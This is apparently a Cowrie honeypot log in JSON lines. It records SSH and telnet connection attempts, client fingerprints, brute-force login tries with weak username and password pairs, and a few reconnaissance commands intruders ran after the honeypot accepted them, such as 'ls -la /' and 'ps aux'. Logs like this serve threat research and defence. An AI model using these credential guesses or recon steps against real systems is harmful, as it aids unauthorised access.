{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.297099Z","src_ip":"212.227.125.160","session":"3e07424c9fbd"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:00.391681Z","src_ip":"212.227.125.160","session":"3e07424c9fbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14254,"dst_ip":"1.2.3.4","dst_port":22,"session":"642c2f014a13","protocol":"ssh","message":"New connection: 212.227.235.229:14254 (1.2.3.4:22) [session: 642c2f014a13]","sensor":"my-vps","timestamp":"2025-08-28T22:05:02.875116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:05:02.876127Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:05:02.980453Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25101984","message":"login attempt [admin/25101984] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:03.483517Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.login.failed","username":"admin","password":"250486","message":"login attempt [admin/250486] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:04.589738Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041982","message":"login attempt [admin/25041982] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:05.696561Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041981","message":"login attempt [admin/25041981] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:06.803708Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041977","message":"login attempt [admin/25041977] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:07.910519Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:09.016711Z","src_ip":"212.227.235.229","session":"642c2f014a13"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14603,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff81fb0a0ad3","protocol":"ssh","message":"New connection: 212.227.235.229:14603 (1.2.3.4:22) [session: ff81fb0a0ad3]","sensor":"my-vps","timestamp":"2025-08-28T22:05:11.221762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:05:11.223111Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:05:11.499316Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34022,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c44ce0a42b9","protocol":"telnet","message":"New connection: 212.227.125.160:34022 (1.2.3.4:23) [session: 5c44ce0a42b9]","sensor":"my-vps","timestamp":"2025-08-28T22:05:11.995576Z"}
{"eventid":"cowrie.login.success","username":"root","password":"10pace","message":"login attempt [root/10pace] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:05:12.353251Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:05:12.927224Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T22:05:12.928079Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:13.213555Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:13.214887Z","src_ip":"212.227.235.229","session":"ff81fb0a0ad3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47560,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3c00207a964","protocol":"telnet","message":"New connection: 212.227.235.229:47560 (1.2.3.4:23) [session: f3c00207a964]","sensor":"my-vps","timestamp":"2025-08-28T22:05:34.956049Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:35.466262Z","src_ip":"212.227.235.229","session":"f3c00207a964"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T22:05:36.940426Z","src_ip":"212.227.235.229","session":"f3c00207a964"}
{"eventid":"cowrie.session.closed","duration":4.544596910476685,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:39.500571Z","src_ip":"212.227.235.229","session":"f3c00207a964"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47568,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c5e63df4c49","protocol":"telnet","message":"New connection: 212.227.235.229:47568 (1.2.3.4:23) [session: 2c5e63df4c49]","sensor":"my-vps","timestamp":"2025-08-28T22:05:39.702893Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:05:40.179564Z","src_ip":"212.227.235.229","session":"2c5e63df4c49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:05:40.197696Z","src_ip":"212.227.235.229","session":"2c5e63df4c49"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T22:05:40.437427Z","src_ip":"212.227.235.229","session":"2c5e63df4c49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:41.574275Z","src_ip":"212.227.235.229","session":"2c5e63df4c49"}
{"eventid":"cowrie.session.closed","duration":1.875279426574707,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:05:41.578099Z","src_ip":"212.227.235.229","session":"2c5e63df4c49"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":48663,"dst_ip":"1.2.3.4","dst_port":23,"session":"0426bc0e05ee","protocol":"telnet","message":"New connection: 123.31.39.100:48663 (1.2.3.4:23) [session: 0426bc0e05ee]","sensor":"my-vps","timestamp":"2025-08-28T22:05:56.004690Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":37009,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b68c11c7fd7","protocol":"telnet","message":"New connection: 123.31.39.100:37009 (1.2.3.4:23) [session: 0b68c11c7fd7]","sensor":"my-vps","timestamp":"2025-08-28T22:05:56.015718Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55416,"dst_ip":"1.2.3.4","dst_port":23,"session":"3a3662db9323","protocol":"telnet","message":"New connection: 212.227.235.229:55416 (1.2.3.4:23) [session: 3a3662db9323]","sensor":"my-vps","timestamp":"2025-08-28T22:05:56.148994Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54839,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdf15417c30b","protocol":"telnet","message":"New connection: 212.227.235.229:54839 (1.2.3.4:23) [session: cdf15417c30b]","sensor":"my-vps","timestamp":"2025-08-28T22:05:57.181776Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":58418,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b39fe45e7bb","protocol":"telnet","message":"New connection: 123.31.39.100:58418 (1.2.3.4:23) [session: 6b39fe45e7bb]","sensor":"my-vps","timestamp":"2025-08-28T22:05:59.077684Z"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":44963,"dst_ip":"1.2.3.4","dst_port":23,"session":"2abfac894c4b","protocol":"telnet","message":"New connection: 123.31.39.100:44963 (1.2.3.4:23) [session: 2abfac894c4b]","sensor":"my-vps","timestamp":"2025-08-28T22:06:01.110724Z"}
{"eventid":"cowrie.session.closed","duration":50.50026297569275,"message":"Connection lost after 50 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:02.495770Z","src_ip":"212.227.125.160","session":"5c44ce0a42b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63655,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef4b22af7b89","protocol":"ssh","message":"New connection: 212.227.125.160:63655 (1.2.3.4:22) [session: ef4b22af7b89]","sensor":"my-vps","timestamp":"2025-08-28T22:06:03.690236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:06:03.691198Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:06:03.774845Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia","message":"login attempt [sylvia/sylvia] failed","sensor":"my-vps","timestamp":"2025-08-28T22:06:04.189924Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1","message":"login attempt [sylvia/sylvia1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:06:05.276816Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia123","message":"login attempt [sylvia/sylvia123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:06:06.363353Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia1234","message":"login attempt [sylvia/sylvia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T22:06:07.449807Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.login.failed","username":"sylvia","password":"sylvia12345","message":"login attempt [sylvia/sylvia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T22:06:08.536006Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:09.622270Z","src_ip":"212.227.125.160","session":"ef4b22af7b89"}
{"eventid":"cowrie.session.connect","src_ip":"147.185.132.210","src_port":64218,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dd7175fad43","protocol":"ssh","message":"New connection: 147.185.132.210:64218 (1.2.3.4:22) [session: 4dd7175fad43]","sensor":"my-vps","timestamp":"2025-08-28T22:06:21.616666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T22:06:22.712020Z","src_ip":"147.185.132.210","session":"4dd7175fad43"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T22:06:23.769207Z","src_ip":"147.185.132.210","session":"4dd7175fad43"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:31.202550Z","src_ip":"147.185.132.210","session":"4dd7175fad43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54277,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c524215239e","protocol":"ssh","message":"New connection: 212.227.235.229:54277 (1.2.3.4:22) [session: 8c524215239e]","sensor":"my-vps","timestamp":"2025-08-28T22:06:36.176851Z"}
{"eventid":"cowrie.session.closed","duration":46.24724340438843,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:42.251852Z","src_ip":"123.31.39.100","session":"0426bc0e05ee"}
{"eventid":"cowrie.session.closed","duration":46.24339532852173,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:42.259060Z","src_ip":"123.31.39.100","session":"0b68c11c7fd7"}
{"eventid":"cowrie.session.closed","duration":46.15061974525452,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:42.299509Z","src_ip":"212.227.235.229","session":"3a3662db9323"}
{"eventid":"cowrie.session.closed","duration":46.135499715805054,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:43.317207Z","src_ip":"212.227.235.229","session":"cdf15417c30b"}
{"eventid":"cowrie.session.closed","duration":46.21308207511902,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:45.290699Z","src_ip":"123.31.39.100","session":"6b39fe45e7bb"}
{"eventid":"cowrie.session.closed","duration":46.211745262145996,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:06:47.322360Z","src_ip":"123.31.39.100","session":"2abfac894c4b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:06:50.650965Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:06:50.651931Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.session.connect","src_ip":"47.254.30.111","src_port":48702,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6782ebc33c0","protocol":"ssh","message":"New connection: 47.254.30.111:48702 (1.2.3.4:22) [session: b6782ebc33c0]","sensor":"my-vps","timestamp":"2025-08-28T22:07:20.940883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:07:20.941975Z","src_ip":"47.254.30.111","session":"b6782ebc33c0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T22:07:21.108496Z","src_ip":"47.254.30.111","session":"b6782ebc33c0"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:07:21.609616Z","src_ip":"47.254.30.111","session":"b6782ebc33c0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:07:21.778148Z","src_ip":"47.254.30.111","session":"b6782ebc33c0"}
{"eventid":"cowrie.login.success","username":"root","password":"12345655","message":"login attempt [root/12345655] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:08:05.606465Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:08:13.413424Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:08:13.414093Z","src_ip":"212.227.235.229","session":"8c524215239e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"4.6","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:08:18.009005Z","src_ip":"212.227.235.229","session":"8c524215239e"}
